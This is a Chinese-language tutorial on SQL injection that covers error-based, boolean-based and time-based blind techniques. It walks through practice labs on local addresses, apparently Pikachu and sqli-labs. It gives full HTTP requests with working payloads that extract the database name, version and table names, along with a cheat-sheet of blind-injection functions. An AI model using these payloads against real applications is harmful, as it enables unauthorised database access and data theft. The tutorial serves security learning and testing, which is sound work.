WEB 漏洞-SQL注入之查询方式及报错盲注

当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句

SQL注入.png

SQL注入-报错盲注

盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行半段或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类

  • 基于报错的SQL盲注-报错回显(优先级:1)floor,updatexml,extractvalue
  • 基于布尔的SQL盲注-逻辑判断(优先级:2)regexp,like,ascii,left,ord,mid
  • 基于时间的SQL盲注-延时判断(优先级:3)if,sleep

基于报错的SQL盲注-报错回显

QQ截图20211207084631.png

  • 使用burp抓包进行手工注入测试

QQ截图20211207084604.png

  • XPATH 报错 updatexml()
POST /vul/sqli/sqli_iu/sqli_reg.php HTTP/1.1
Host: 192.168.50.10:82
Content-Length: 136
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:82
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:82/vul/sqli/sqli_iu/sqli_reg.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close

username=admin' and updatexml(1,concat('^',(select database()),'^'),1) and '1'='1&password=test&sex=&phonenum=&email=&add=&submit=submit

QQ截图20211207085458.png

  • group by重复键冲突,利用了rand()和group by语句聚合的特性,在生成字段和聚合的时候生成重复字段来使sql报错,由于使用了rand(),所以sql报错具有随机性
POST /vul/sqli/sqli_iu/sqli_reg.php HTTP/1.1
Host: 192.168.50.10:82
Content-Length: 240
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:82
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:82/vul/sqli/sqli_iu/sqli_reg.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close

username=admin' or (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) or '&password=test&sex=&phonenum=&email=&add=&submit=submit

基于布尔的SQL盲注-逻辑判断

页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据

  • 当前数据库database()的长度为8,返回true页面,否则FALSE页面

QQ截图20211207092511.png

GET /Less-8/?id=1' and (length(database()))=8 --+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close
  • 猜当前数据库第一个字符,利用二分法,115为fal,114TRUE,数据库第一个字符ASCII为115,即s.同理修改substr(database(),2,1)可猜第二个字符,之后同理,当然在猜数据库字符前也可先猜数据库长度:length(database())

QQ截图20211207092834.png

GET /Less-8/?id=1' and ascii(substr(database(),1,1))=115--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close
  • 其他盲注语句
like 'ro%'                      #判断ro或ro...是否成立
regexp '^xiaodi[1-z]'    #匹配xiaodi及xiaodi...等
if(条件,5,0)                   #条件成立,返回5,反之,返回0
sleep(5)                       #SQL语句延时执行5秒
mid(a,b,c)                    #从位置b开始,截取a字符串的c位
substr(a,b,c)                #从B位置开始,截取字符串a的c长度
left(database(),1),database()    #left(a,b)从左侧截取a的前b位
length(database())=8   #判断数据库database()名的长度
ord=ascii ascii(x)=97   #判断x的ascii码是否等于97

基于时间的SQL盲注-延时判断

利用sleep()语句的延时性,以时间线作为判断条件

and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit    0,1),1,1))=101,sleep(3),0)--+

image.png

微信截图_20210523202949.png

image (1).png

资源